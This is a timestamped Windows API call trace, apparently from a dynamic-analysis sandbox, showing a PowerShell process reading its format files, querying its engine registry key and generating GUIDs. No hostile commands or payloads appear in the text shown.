	[0470.699] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.699] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0470.699] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0xaca, lpOverlapped=0x0) returned 1
	[0470.699] ReadFile (in: hFile=0x314, lpBuffer=0x3431092, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431092*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0470.699] ReadFile (in: hFile=0x314, lpBuffer=0x3431a60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3431a60*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0470.700] CloseHandle (hObject=0x314) returned 1
	[0470.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.700] SetErrorMode (uMode=0x1) returned 0x1
	[0470.700] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0470.700] SetErrorMode (uMode=0x1) returned 0x1
	[0470.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.700] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x314) returned 0x0
	[0470.700] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0470.700] CoTaskMemAlloc (cb=0x5a) returned 0x1b818c60
	[0470.701] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x1b818c60, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0470.701] CoTaskMemFree (pv=0x1b818c60) 
	[0470.701] RegCloseKey (hKey=0x314) returned 0x0
	[0470.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0470.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0470.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0472.342] VirtualQuery (in: lpAddress=0x16bba0, lpBuffer=0x16ca60, dwLength=0x30 | out: lpBuffer=0x16ca60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.343] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xa4ef15c, Data2=0xf8da, Data3=0x4977, Data4=([0]=0xad, [1]=0x56, [2]=0xce, [3]=0x9b, [4]=0x7, [5]=0x40, [6]=0xf2, [7]=0x34))) returned 0x0
	[0472.344] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xde8f69fa, Data2=0x1ff2, Data3=0x492f, Data4=([0]=0x87, [1]=0x26, [2]=0xde, [3]=0x3, [4]=0x2, [5]=0xf7, [6]=0xad, [7]=0xa3))) returned 0x0
	[0472.345] VirtualQuery (in: lpAddress=0x16bd50, lpBuffer=0x16cc10, dwLength=0x30 | out: lpBuffer=0x16cc10*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.346] VirtualQuery (in: lpAddress=0x16bd50, lpBuffer=0x16cc10, dwLength=0x30 | out: lpBuffer=0x16cc10*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.347] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x19cd2f4f, Data2=0x24f9, Data3=0x42af, Data4=([0]=0x80, [1]=0x7e, [2]=0x40, [3]=0x86, [4]=0xc5, [5]=0x4a, [6]=0x49, [7]=0x90))) returned 0x0
	[0472.350] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x23d738cc, Data2=0xd841, Data3=0x4f76, Data4=([0]=0xa4, [1]=0x37, [2]=0x5a, [3]=0x5d, [4]=0xe, [5]=0x24, [6]=0x47, [7]=0x31))) returned 0x0
	[0472.350] VirtualQuery (in: lpAddress=0x16bfa0, lpBuffer=0x16ce60, dwLength=0x30 | out: lpBuffer=0x16ce60*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0472.351] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x31c8a081, Data2=0x3068, Data3=0x4a1f, Data4=([0]=0x8a, [1]=0x76, [2]=0x41, [3]=0xe7, [4]=0x69, [5]=0x89, [6]=0x36, [7]=0x8f))) returned 0x0
	[0472.352] VirtualQuery (in: lpAddress=0x16b610, lpBuffer=0x16c4d0, dwLength=0x30 | out: lpBuffer=0x16c4d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0473.707] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xa5971958, Data2=0x9a50, Data3=0x4e3d, Data4=([0]=0x85, [1]=0x60, [2]=0x91, [3]=0x5e, [4]=0xed, [5]=0x76, [6]=0x7, [7]=0xa0))) returned 0x0
	[0473.708] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x69bb284b, Data2=0x2f6e, Data3=0x4e03, Data4=([0]=0xa3, [1]=0x38, [2]=0x91, [3]=0xf0, [4]=0xb5, [5]=0xaf, [6]=0xd6, [7]=0xf3))) returned 0x0
	[0473.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.709] SetErrorMode (uMode=0x1) returned 0x1
	[0473.709] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0473.709] GetFileType (hFile=0x338) returned 0x1
	[0473.709] SetErrorMode (uMode=0x1) returned 0x1
	[0473.709] GetFileType (hFile=0x338) returned 0x1
	[0473.709] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.710] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.711] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.711] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.712] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.712] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.712] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.712] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.713] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.713] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.713] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.714] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.714] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.714] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.714] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.714] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.716] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0473.716] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0xbce, lpOverlapped=0x0) returned 1
	[0473.716] ReadFile (in: hFile=0x338, lpBuffer=0x34e3c4e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e3c4e*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0473.716] ReadFile (in: hFile=0x338, lpBuffer=0x34e4518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x34e4518*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0473.716] CloseHandle (hObject=0x338) returned 1
	[0473.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.717] SetErrorMode (uMode=0x1) returned 0x1
	[0473.717] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0473.717] SetErrorMode (uMode=0x1) returned 0x1
	[0473.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.717] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x338) returned 0x0
	[0473.717] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0473.717] CoTaskMemAlloc (cb=0x5a) returned 0x272150
	[0473.717] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x272150, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0473.717] CoTaskMemFree (pv=0x272150) 
	[0473.718] RegCloseKey (hKey=0x338) returned 0x0
	[0473.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0473.721] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xd506724b, Data2=0x1e65, Data3=0x4dac, Data4=([0]=0x95, [1]=0x92, [2]=0xc3, [3]=0x1b, [4]=0xd8, [5]=0xb0, [6]=0x7e, [7]=0x1e))) returned 0x0
	[0473.722] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x9f2b1909, Data2=0xd4fd, Data3=0x4619, Data4=([0]=0xa3, [1]=0x77, [2]=0x29, [3]=0xff, [4]=0x86, [5]=0xec, [6]=0x1d, [7]=0x2f))) returned 0x0
	[0473.722] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x12488e00, Data2=0xd6da, Data3=0x4b74, Data4=([0]=0x87, [1]=0xd3, [2]=0x52, [3]=0xb1, [4]=0x3e, [5]=0xce, [6]=0x89, [7]=0x7c))) returned 0x0
	[0473.723] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x133a4c45, Data2=0xab31, Data3=0x4a01, Data4=([0]=0xa4, [1]=0x37, [2]=0x2f, [3]=0xa3, [4]=0xe5, [5]=0xa2, [6]=0x36, [7]=0x38))) returned 0x0
	[0473.724] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x3f9a1ed5, Data2=0xa014, Data3=0x4ed2, Data4=([0]=0x94, [1]=0x9, [2]=0xef, [3]=0x3f, [4]=0x93, [5]=0x2f, [6]=0x70, [7]=0x3f))) returned 0x0
	[0473.724] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xf43db5e3, Data2=0xa2c8, Data3=0x4cd7, Data4=([0]=0xa1, [1]=0x48, [2]=0x44, [3]=0x76, [4]=0x5c, [5]=0x75, [6]=0xff, [7]=0x7a))) returned 0x0
	[0473.725] VirtualQuery (in: lpAddress=0x16bce0, lpBuffer=0x16cba0, dwLength=0x30 | out: lpBuffer=0x16cba0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0473.726] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x8522d02b, Data2=0x7df2, Data3=0x4d49, Data4=([0]=0x83, [1]=0xcd, [2]=0x85, [3]=0x53, [4]=0x2c, [5]=0x2, [6]=0x54, [7]=0x7))) returned 0x0
	[0473.726] VirtualQuery (in: lpAddress=0x16bce0, lpBuffer=0x16cba0, dwLength=0x30 | out: lpBuffer=0x16cba0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0473.727] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xf1b2b307, Data2=0xb773, Data3=0x48bd, Data4=([0]=0x95, [1]=0x36, [2]=0xa6, [3]=0x63, [4]=0xbe, [5]=0x59, [6]=0x4e, [7]=0x2a))) returned 0x0
	[0473.728] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xd9c152a7, Data2=0x1d90, Data3=0x4872, Data4=([0]=0x91, [1]=0x6a, [2]=0x9a, [3]=0x6b, [4]=0x9d, [5]=0xe, [6]=0x4b, [7]=0x9a))) returned 0x0
	[0473.728] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x9be597a4, Data2=0xdbda, Data3=0x4641, Data4=([0]=0xbb, [1]=0x43, [2]=0xae, [3]=0x39, [4]=0xd1, [5]=0x27, [6]=0x2e, [7]=0xe5))) returned 0x0
	[0473.728] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x5bf005b9, Data2=0x838e, Data3=0x4a38, Data4=([0]=0xbc, [1]=0xfc, [2]=0xd7, [3]=0x6b, [4]=0xe9, [5]=0x87, [6]=0x77, [7]=0x1))) returned 0x0
	[0473.728] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x95767339, Data2=0xd343, Data3=0x415e, Data4=([0]=0xb0, [1]=0xe9, [2]=0xc6, [3]=0x4f, [4]=0xbd, [5]=0x32, [6]=0x13, [7]=0x1d))) returned 0x0
	[0473.729] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x104dea93, Data2=0x1a25, Data3=0x4f5b, Data4=([0]=0xa9, [1]=0x7, [2]=0x72, [3]=0x62, [4]=0xf6, [5]=0x96, [6]=0x81, [7]=0xe5))) returned 0x0
	[0473.729] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xfe4227ea, Data2=0x92fd, Data3=0x4f3b, Data4=([0]=0xa7, [1]=0x59, [2]=0x23, [3]=0xe5, [4]=0x14, [5]=0xf0, [6]=0x94, [7]=0xe8))) returned 0x0
	[0473.729] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x6ee43dbc, Data2=0xf720, Data3=0x446e, Data4=([0]=0x93, [1]=0xe8, [2]=0xf5, [3]=0x37, [4]=0x53, [5]=0xa8, [6]=0xef, [7]=0x1f))) returned 0x0
	[0473.729] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x8efb5787, Data2=0x30c7, Data3=0x4700, Data4=([0]=0xb6, [1]=0x0, [2]=0xc8, [3]=0xd4, [4]=0x37, [5]=0x92, [6]=0x4, [7]=0x3a))) returned 0x0
	[0473.730] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb0f2ef76, Data2=0x48e5, Data3=0x42b4, Data4=([0]=0xb9, [1]=0xe1, [2]=0xb8, [3]=0xe, [4]=0x4a, [5]=0xf1, [6]=0x67, [7]=0xae))) returned 0x0
	[0473.730] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x4e5e844, Data2=0x723f, Data3=0x4bd0, Data4=([0]=0x92, [1]=0xb6, [2]=0x40, [3]=0xe7, [4]=0xd8, [5]=0xd5, [6]=0x29, [7]=0xf7))) returned 0x0
	[0473.730] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x4fd7fd95, Data2=0x3dde, Data3=0x4fc1, Data4=([0]=0xb6, [1]=0x4e, [2]=0xb5, [3]=0x63, [4]=0x2f, [5]=0x7e, [6]=0x7f, [7]=0x62))) returned 0x0
	[0473.730] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x24d24e91, Data2=0xe96a, Data3=0x41fe, Data4=([0]=0x94, [1]=0x4b, [2]=0x59, [3]=0x29, [4]=0xdc, [5]=0x4a, [6]=0xe2, [7]=0x11))) returned 0x0
	[0473.730] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xbb6e6d3d, Data2=0x3233, Data3=0x426d, Data4=([0]=0xa0, [1]=0x57, [2]=0x23, [3]=0xa4, [4]=0xdb, [5]=0x83, [6]=0xf4, [7]=0xd6))) returned 0x0
	[0473.731] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x246b5f1d, Data2=0xc1a9, Data3=0x4259, Data4=([0]=0xb3, [1]=0x34, [2]=0xda, [3]=0xd0, [4]=0x19, [5]=0x84, [6]=0xaa, [7]=0xaa))) returned 0x0
	[0473.731] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xc1673c10, Data2=0xdd35, Data3=0x49ae, Data4=([0]=0x95, [1]=0x89, [2]=0x20, [3]=0xc, [4]=0x1a, [5]=0xcb, [6]=0x46, [7]=0x26))) returned 0x0
	[0473.731] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x94fac6d6, Data2=0x7389, Data3=0x46f4, Data4=([0]=0xa7, [1]=0x1e, [2]=0x1f, [3]=0xd0, [4]=0x52, [5]=0x1c, [6]=0x64, [7]=0xde))) returned 0x0
	[0473.731] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x852b32de, Data2=0x1e86, Data3=0x4eac, Data4=([0]=0xb5, [1]=0x74, [2]=0x36, [3]=0x4e, [4]=0xdf, [5]=0x86, [6]=0xfb, [7]=0x69))) returned 0x0
	[0473.731] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x98775415, Data2=0xcdd4, Data3=0x4109, Data4=([0]=0xa9, [1]=0x4, [2]=0x15, [3]=0x30, [4]=0x92, [5]=0xde, [6]=0x70, [7]=0xf8))) returned 0x0
	[0473.731] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb02412a, Data2=0x9342, Data3=0x47ba, Data4=([0]=0xaa, [1]=0xb0, [2]=0xa6, [3]=0xc9, [4]=0x15, [5]=0x74, [6]=0xd5, [7]=0x1b))) returned 0x0
	[0473.731] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x4a43ae6f, Data2=0x3cba, Data3=0x4632, Data4=([0]=0x97, [1]=0x8d, [2]=0x7d, [3]=0xb2, [4]=0xe7, [5]=0xd1, [6]=0xd7, [7]=0xfe))) returned 0x0
	[0473.732] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x69ec6d75, Data2=0xb7cf, Data3=0x4d41, Data4=([0]=0xb0, [1]=0x68, [2]=0xb6, [3]=0x3e, [4]=0x8e, [5]=0x56, [6]=0x8e, [7]=0xf2))) returned 0x0
	[0473.732] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x65d0ca98, Data2=0x6f18, Data3=0x4fc8, Data4=([0]=0xa5, [1]=0x66, [2]=0xca, [3]=0x56, [4]=0xd, [5]=0xe1, [6]=0xc5, [7]=0xd0))) returned 0x0
